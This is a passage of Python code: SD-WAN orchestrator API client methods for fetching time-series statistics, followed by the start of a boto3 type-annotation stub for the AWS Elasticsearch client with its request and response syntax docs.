for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param overlay: When set to ``all``, return all bonded tunnels; when
set to ``0``, return all physical tunnels; when not used, return
all bonded and physical tunnels; otherwise, return bonded
tunnels associated with the specified overlay id,
defaults to None
:type overlay: str, optional
:param tunnel_type: Accepted values for overlays are:
``0`` – SD-WAN, ``2`` – Breakout, ``3`` – Services. Accepted
values for non-overlays are: ``1`` - Underlay, ``2`` –
Pass-through, and ``3`` – Services, defaults to None
:type tunnel_type: int, optional
:param label_id: Label internal id, defaults to None
:type label_id: int, optional
:param is_wan_side: ``True`` to get WAN side data or ``False`` to get
LAN side data, defaults to None
:type is_wan_side: bool, optional
:param interface_name: Filter data by interface name,
defaults to None
:type interface_name: str, optional
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/interfaceOverlay/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
if overlay is not None:
path = path + "&overlay={}".format(overlay)
if tunnel_type is not None:
path = path + "&tunnelType={}".format(tunnel_type)
if label_id is not None:
path = path + "&labelId={}".format(label_id)
if is_wan_side is not None:
path = path + "&isWanSide={}".format(is_wan_side)
if interface_name is not None:
path = path + "&interfaceName={}".format(interface_name)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
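# Hedged sketches of the ``overlay`` filter described above (client
# instance ``orch`` and epoch bounds ``t0``/``t1`` assumed):
#
#   # bonded tunnels only
#   bonded = orch.get_timeseries_stats_interface_overlay_single_appliance(
#       ne_pk="3.NE", start_time=t0, end_time=t1,
#       granularity="minute", overlay="all")
#   # physical tunnels only
#   physical = orch.get_timeseries_stats_interface_overlay_single_appliance(
#       ne_pk="3.NE", start_time=t0, end_time=t1,
#       granularity="minute", overlay="0")
#   # bonded and physical tunnels together
#   both = orch.get_timeseries_stats_interface_overlay_single_appliance(
#       ne_pk="3.NE", start_time=t0, end_time=t1,
#       granularity="minute")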
def get_timeseries_stats_mos_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
tunnel_name: str,
limit: int = None,
) -> list:
"""Get time series MOS statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/mos/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param tunnel_name: Filter for data which belongs to tunnel with
matching name
:type tunnel_name: str
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/mos/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
path = path + "&tunnel={}".format(tunnel_name)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_application(
self,
start_time: int,
end_time: int,
application: str,
group_pk: str = None,
data_format: str = None,
total: bool = None,
latest: int = None,
) -> dict:
"""Get time series application statistics
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/application2
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param application: Filter for data belonging to application with
matching name
:type application: str
:param group_pk: Filter by appliance group identifier,
e.g. ``0.Network`` is root group, ``1.Network`` is internal use,
``2.Network`` is auto-discovered groups, ``3.Network`` and
beyond is user-defined groups, defaults to None
:type group_pk: str, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param total: Get application's total value if True,
defaults to None
:type total: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/application2?startTime="
+ "{}&endTime={}&application={}".format(
start_time, end_time, application
)
)
if group_pk is not None:
path = path + "&groupPk={}".format(group_pk)
if data_format is not None:
path = path + "&format={}".format(data_format)
if total is not None:
path = path + "&total={}".format(total)
if latest is not None:
path = path + "&latest={}".format(latest)
return self._get(path)
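# Sketch of the ``latest`` override noted in the docstring: when ``latest``
# is set the API favors it over the start/end bounds, so the call below
# effectively asks for the last 10 minutes (client instance and
# application name assumed).
#
#   recent = orch.get_timeseries_stats_application(
#       start_time=1640995200,
#       end_time=1641081600,
#       application="https",
#       latest=10,
#   )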
def get_timeseries_stats_application_ne_pk_list(
self,
ne_pk_list: list[str],
start_time: int,
end_time: int,
application: str,
data_format: str = None,
total: bool = None,
latest: int = None,
) -> dict:
"""Get time series application statistics for list of appliances
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- POST
- /stats/timeseries/application2
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk_list: List of one or more appliance Network Primary
Keys (nePk), e.g. ``["3.NE","5.NE"]``
:type ne_pk_list: list[str]
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param application: Filter for data belonging to application with
matching name
:type application: str
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param total: Get application's total value if True,
defaults to None
:type total: bool, optional
:param latest: Latest time window to retrieve stats from. Unit is
minute. e.g. ``10``. Default is to use ``start_time`` and
``end_time`` but if ``latest`` is not ``None`` then it takes
priority, defaults to None
:type latest: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/application2?startTime="
+ "{}&endTime={}&application={}".format(
start_time, end_time, application
)
)
if data_format is not None:
path = path + "&format={}".format(data_format)
if total is not None:
path = path + "&total={}".format(total)
if latest is not None:
path = path + "&latest={}".format(latest)
data = {"ids": ne_pk_list}
return self._post(path, data=data)
def get_timeseries_stats_application_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
application: str,
total: bool = None,
data_format: str = None,
) -> dict:
"""Get time series application statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/application2/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param application: Filter for data belonging to application with
matching name
:type application: str
:param total: Get application's total value if True,
defaults to None
:type total: bool, optional
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/application2/"
+ "{}?startTime={}&endTime={}&application={}".format(
ne_pk, start_time, end_time, application
)
)
if total is not None:
path = path + "&total={}".format(total)
if data_format is not None:
path = path + "&format={}".format(data_format)
return self._get(path)
def get_timeseries_stats_boost_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
limit: int = None,
) -> list:
"""Get time series boost statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/boost/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns list of dictionaries
:rtype: list
"""
path = (
"/stats/timeseries/boost/"
+ "{}?startTime={}&endTime={}&granularity={}".format(
ne_pk, start_time, end_time, granularity
)
)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
def get_timeseries_stats_security_policy_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
from_zone: str,
to_zone: str,
) -> dict:
"""Get time series security policy statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/securityPolicy/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param from_zone: Filter for data which come from the zone indicated
by this zone internal ID
:type from_zone: str
:param to_zone: Filter for data which go to the zone indicated by
this zone internal ID
:type to_zone: str
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/securityPolicy/"
+ "{}?startTime={}&endTime={}".format(
ne_pk, start_time, end_time
)
+ "&granularity={}&fromZone={}&toZone={}".format(
granularity, from_zone, to_zone
)
)
return self._get(path)
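# A call sketch (client instance ``orch`` and zone internal ids assumed):
# both zone filters are required, scoping traffic from one zone id to
# another at the chosen granularity.
#
#   zone_stats = orch.get_timeseries_stats_security_policy_single_appliance(
#       ne_pk="3.NE",
#       start_time=1640995200,
#       end_time=1641081600,
#       granularity="minute",
#       from_zone="1",
#       to_zone="2",
#   )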
def get_timeseries_stats_jitter_single_appliance(
self,
ne_pk: str,
start_time: int,
end_time: int,
granularity: str,
tunnel_name: str,
data_format: str = None,
limit: int = None,
) -> dict:
"""Get time series security policy statistics for single appliance
.. list-table::
:header-rows: 1
* - Swagger Section
- Method
- Endpoint
* - timeseriesStats
- GET
- /stats/timeseries/jitter/{nePk}
This operation returns a JSON object containing COLUMN_DEF and DATA.
COLUMN_DEF is an array of names indicating what the corresponding
number in each data array means. The data object for each appliance
is an array of data arrays, where each data array contains the stats
for a particular timestamp. Each number in a data array corresponds
to a name in COLUMN_DEF.
The DATA object contains only values, not keys.
:param ne_pk: Network Primary Key (nePk) of appliance, e.g. ``3.NE``
:type ne_pk: str
:param start_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the starting time boundary of data time range
:type start_time: int
:param end_time: Long(Signed 64 bits) value of seconds since EPOCH
time indicating the ending time boundary of data time range
:type end_time: int
:param granularity: Data granularity filtering whether data is
minutely data, hourly data or daily data. Accepted values are
``minute``, ``hour``, and ``day``
:type granularity: str
:param tunnel_name: Filter for data which belongs to specified
tunnel name
:type tunnel_name: str
:param data_format: The only format other than JSON currently
supported is CSV, accepted value is ``csv``, defaults to None
:type data_format: str, optional
:param limit: Limit the number of stats entries retrieved. When
unspecified, the API defaults to 10,000, which is also the maximum
allowed value, defaults to None
:type limit: int, optional
:return: Returns nested dictionary
:rtype: dict
"""
path = (
"/stats/timeseries/jitter/"
+ "{}?startTime={}&endTime={}&granularity={}&tunnel={}".format(
ne_pk, start_time, end_time, granularity, tunnel_name
)
)
if data_format is not None:
path = path + "&format={}".format(data_format)
if limit is not None:
path = path + "&limit={}".format(limit)
return self._get(path)
# boto3_type_annotations/es/client.py
from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import Union
from typing import List
class Client(BaseClient):
def add_tags(self, ARN: str, TagList: List):
"""
Attaches tags to an existing Elasticsearch domain. Tags are a set of case-sensitive key value pairs. An Elasticsearch domain may have up to 10 tags. See `Tagging Amazon Elasticsearch Service Domains for more information. <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-awsresorcetagging>`__
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/AddTags>`_
**Request Syntax**
::
response = client.add_tags(
ARN='string',
TagList=[
{
'Key': 'string',
'Value': 'string'
},
]
)
:type ARN: string
:param ARN: **[REQUIRED]**
Specify the ``ARN`` for which you want to add the tags.
:type TagList: list
:param TagList: **[REQUIRED]**
List of ``Tag`` that need to be added for the Elasticsearch domain.
- *(dict) --*
Specifies a key value pair for a resource tag.
- **Key** *(string) --* **[REQUIRED]**
Specifies the ``TagKey`` , the name of the tag. Tag keys must be unique for the Elasticsearch domain to which they are attached.
- **Value** *(string) --* **[REQUIRED]**
Specifies the ``TagValue`` , the value assigned to the corresponding tag key. Tag values can be null and do not have to be unique in a tag set. For example, you can have a key value pair in a tag set of ``project : Trinity`` and ``cost-center : Trinity``
:returns: None
"""
pass
def can_paginate(self, operation_name: str = None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is ``create_foo``, and you\'d normally invoke the
operation as ``client.create_foo(**kwargs)``, if the
``create_foo`` operation can be paginated, you can use the
call ``client.get_paginator(\"create_foo\")``.
:return: ``True`` if the operation can be paginated,
``False`` otherwise.
"""
pass
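# A hedged usage sketch assuming a configured boto3 session; the
# operation name is illustrative of a paginated call:
#
#   client = boto3.client('es')
#   if client.can_paginate('list_elasticsearch_versions'):
#       paginator = client.get_paginator('list_elasticsearch_versions')
#       for page in paginator.paginate():
#           print(page['ElasticsearchVersions'])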
def cancel_elasticsearch_service_software_update(self, DomainName: str) -> Dict:
"""
Cancels a scheduled service software update for an Amazon ES domain. You can only perform this operation before the ``AutomatedUpdateDate`` and when the ``UpdateStatus`` is in the ``PENDING_UPDATE`` state.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/CancelElasticsearchServiceSoftwareUpdate>`_
**Request Syntax**
::
response = client.cancel_elasticsearch_service_software_update(
DomainName='string'
)
**Response Syntax**
::
{
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
**Response Structure**
- *(dict) --*
The result of a ``CancelElasticsearchServiceSoftwareUpdate`` operation. Contains the status of the update.
- **ServiceSoftwareOptions** *(dict) --*
The current status of the Elasticsearch service software update.
- **CurrentVersion** *(string) --*
The current service software version that is present on the domain.
- **NewVersion** *(string) --*
The new service software version if one is available.
- **UpdateAvailable** *(boolean) --*
``True`` if you are able to update your service software version. ``False`` if you are not able to update your service software version.
- **Cancellable** *(boolean) --*
``True`` if you are able to cancel your service software version update. ``False`` if you are not able to cancel your service software version.
- **UpdateStatus** *(string) --*
The status of your service software update. This field can take the following values: ``ELIGIBLE`` , ``PENDING_UPDATE`` , ``IN_PROGRESS`` , ``COMPLETED`` , and ``NOT_ELIGIBLE`` .
- **Description** *(string) --*
The description of the ``UpdateStatus`` .
- **AutomatedUpdateDate** *(datetime) --*
Timestamp, in Epoch time, until which you can manually request a service software update. After this date, we automatically update your service software.
:type DomainName: string
:param DomainName: **[REQUIRED]**
The name of the domain that you want to stop the latest service software update on.
:rtype: dict
:returns:
"""
pass
def create_elasticsearch_domain(self, DomainName: str, ElasticsearchVersion: str = None, ElasticsearchClusterConfig: Dict = None, EBSOptions: Dict = None, AccessPolicies: str = None, SnapshotOptions: Dict = None, VPCOptions: Dict = None, CognitoOptions: Dict = None, EncryptionAtRestOptions: Dict = None, NodeToNodeEncryptionOptions: Dict = None, AdvancedOptions: Dict = None, LogPublishingOptions: Dict = None) -> Dict:
"""
Creates a new Elasticsearch domain. For more information, see `Creating Elasticsearch Domains <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-createupdatedomains.html#es-createdomains>`__ in the *Amazon Elasticsearch Service Developer Guide* .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/es-2015-01-01/CreateElasticsearchDomain>`_
**Request Syntax**
::
response = client.create_elasticsearch_domain(
DomainName='string',
ElasticsearchVersion='string',
ElasticsearchClusterConfig={
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
EBSOptions={
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
AccessPolicies='string',
SnapshotOptions={
'AutomatedSnapshotStartHour': 123
},
VPCOptions={
'SubnetIds': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
CognitoOptions={
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
EncryptionAtRestOptions={
'Enabled': True|False,
'KmsKeyId': 'string'
},
NodeToNodeEncryptionOptions={
'Enabled': True|False
},
AdvancedOptions={
'string': 'string'
},
LogPublishingOptions={
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
}
)
**Response Syntax**
::
{
'DomainStatus': {
'DomainId': 'string',
'DomainName': 'string',
'ARN': 'string',
'Created': True|False,
'Deleted': True|False,
'Endpoint': 'string',
'Endpoints': {
'string': 'string'
},
'Processing': True|False,
'UpgradeProcessing': True|False,
'ElasticsearchVersion': 'string',
'ElasticsearchClusterConfig': {
'InstanceType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'InstanceCount': 123,
'DedicatedMasterEnabled': True|False,
'ZoneAwarenessEnabled': True|False,
'ZoneAwarenessConfig': {
'AvailabilityZoneCount': 123
},
'DedicatedMasterType': 'm3.medium.elasticsearch'|'m3.large.elasticsearch'|'m3.xlarge.elasticsearch'|'m3.2xlarge.elasticsearch'|'m4.large.elasticsearch'|'m4.xlarge.elasticsearch'|'m4.2xlarge.elasticsearch'|'m4.4xlarge.elasticsearch'|'m4.10xlarge.elasticsearch'|'t2.micro.elasticsearch'|'t2.small.elasticsearch'|'t2.medium.elasticsearch'|'r3.large.elasticsearch'|'r3.xlarge.elasticsearch'|'r3.2xlarge.elasticsearch'|'r3.4xlarge.elasticsearch'|'r3.8xlarge.elasticsearch'|'i2.xlarge.elasticsearch'|'i2.2xlarge.elasticsearch'|'d2.xlarge.elasticsearch'|'d2.2xlarge.elasticsearch'|'d2.4xlarge.elasticsearch'|'d2.8xlarge.elasticsearch'|'c4.large.elasticsearch'|'c4.xlarge.elasticsearch'|'c4.2xlarge.elasticsearch'|'c4.4xlarge.elasticsearch'|'c4.8xlarge.elasticsearch'|'r4.large.elasticsearch'|'r4.xlarge.elasticsearch'|'r4.2xlarge.elasticsearch'|'r4.4xlarge.elasticsearch'|'r4.8xlarge.elasticsearch'|'r4.16xlarge.elasticsearch'|'i3.large.elasticsearch'|'i3.xlarge.elasticsearch'|'i3.2xlarge.elasticsearch'|'i3.4xlarge.elasticsearch'|'i3.8xlarge.elasticsearch'|'i3.16xlarge.elasticsearch',
'DedicatedMasterCount': 123
},
'EBSOptions': {
'EBSEnabled': True|False,
'VolumeType': 'standard'|'gp2'|'io1',
'VolumeSize': 123,
'Iops': 123
},
'AccessPolicies': 'string',
'SnapshotOptions': {
'AutomatedSnapshotStartHour': 123
},
'VPCOptions': {
'VPCId': 'string',
'SubnetIds': [
'string',
],
'AvailabilityZones': [
'string',
],
'SecurityGroupIds': [
'string',
]
},
'CognitoOptions': {
'Enabled': True|False,
'UserPoolId': 'string',
'IdentityPoolId': 'string',
'RoleArn': 'string'
},
'EncryptionAtRestOptions': {
'Enabled': True|False,
'KmsKeyId': 'string'
},
'NodeToNodeEncryptionOptions': {
'Enabled': True|False
},
'AdvancedOptions': {
'string': 'string'
},
'LogPublishingOptions': {
'string': {
'CloudWatchLogsLogGroupArn': 'string',
'Enabled': True|False
}
},
'ServiceSoftwareOptions': {
'CurrentVersion': 'string',
'NewVersion': 'string',
'UpdateAvailable': True|False,
'Cancellable': True|False,
'UpdateStatus': 'PENDING_UPDATE'|'IN_PROGRESS'|'COMPLETED'|'NOT_ELIGIBLE'|'ELIGIBLE',
'Description': 'string',
'AutomatedUpdateDate': datetime(2015, 1, 1)
}
}
}
**Response Structure**
- *(dict) --*
The result of a ``CreateElasticsearchDomain`` operation. Contains the status of the newly created Elasticsearch domain.
- **DomainStatus** *(dict) --*
The status of the newly created Elasticsearch domain.
- **DomainId** *(string) --*
The unique identifier for the specified Elasticsearch domain.
- **DomainName** *(string) --*
The name of an Elasticsearch domain. Domain names are unique across the domains owned by an account within an AWS region. Domain names start with a letter or number and can contain the following characters: a-z (lowercase), 0-9, and - (hyphen).
- **ARN** *(string) --*
The Amazon resource name (ARN) of an Elasticsearch domain. See `Identifiers for IAM Entities <http://docs.aws.amazon.com/IAM/latest/UserGuide/index.html?Using_Identifiers.html>`__ in *Using AWS Identity and Access Management* for more information.
- **Created** *(boolean) --*
The domain creation status. ``True`` if the creation of an Elasticsearch domain is complete. ``False`` if domain creation is still in progress.
- **Deleted** *(boolean) --*
The domain deletion status. ``True`` if a delete request has been received for the domain but resource cleanup is still in progress. ``False`` if the domain has not been deleted. Once domain deletion is complete, the status of the domain is no longer returned.
- **Endpoint** *(string) --*
The Elasticsearch domain endpoint that you use to submit index and search requests.
- **Endpoints** *(dict) --*
Map containing the Elasticsearch domain endpoints used to submit index and search requests. Example ``key, value`` : ``'vpc','vpc-endpoint-h2dsd34efgyghrtguk5gt6j2foh4.us-east-1.es.amazonaws.com'`` .
- *(string) --*
- *(string) --*
The endpoint to which service requests are submitted. For example, ``search-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` or ``doc-imdb-movies-oopcnjfn6ugofer3zx5iadxxca.eu-west-1.es.amazonaws.com`` .
- **Processing** *(boolean) --*
The status of the Elasticsearch domain configuration. ``True`` if Amazon Elasticsearch Service is processing configuration changes. ``False`` if the configuration is active.
- **UpgradeProcessing** *(boolean) --*
The status of an Elasticsearch domain version upgrade. ``True`` if Amazon Elasticsearch Service is undergoing a version upgrade. ``False`` if the configuration is active.
- **ElasticsearchVersion** *(string) --*
- **ElasticsearchClusterConfig** *(dict) --*
The type and number of instances in the domain cluster.
- **InstanceType** *(string) --*
The instance type for an Elasticsearch cluster.
- **InstanceCount** *(integer) --*
The number of instances in the specified domain cluster.
- **DedicatedMasterEnabled** *(boolean) --*
A boolean value to indicate whether a dedicated master node is enabled. See `About Dedicated Master Nodes <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-dedicatedmasternodes>`__ for more information.
- **ZoneAwarenessEnabled** *(boolean) --*
A boolean value to indicate whether zone awareness is enabled. See `About Zone Awareness <http://docs.aws.amazon.com/elasticsearch-service/latest/developerguide/es-managedomains.html#es-managedomains-zoneawareness>`__ for more information.
